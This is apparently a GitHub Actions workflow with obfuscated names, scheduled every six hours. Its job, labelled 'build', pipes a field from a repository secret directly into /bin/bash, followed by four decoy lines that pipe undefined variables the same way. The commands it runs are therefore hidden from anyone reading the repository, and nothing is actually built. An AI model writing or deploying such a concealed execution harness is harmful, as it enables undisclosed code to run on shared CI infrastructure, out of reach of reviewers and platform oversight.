name: xuguoqiang3456
on:
  workflow_dispatch:
  schedule:
    - cron: '39 0/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: xuguoqiang3456
        env:
          qesaw62: ${{ secrets.qesaw62 }}
        run: |
          echo $qesaw62 | jq -r .vw0 | /bin/bash
          echo $zr81482 | jq -r .zq82319 | /bin/bash
          echo $ne9933 | jq -r .oe39 | /bin/bash
          echo $i48 | jq -r .n0416 | /bin/bash
          echo $gpit5 | jq -r .qh98 | /bin/bash

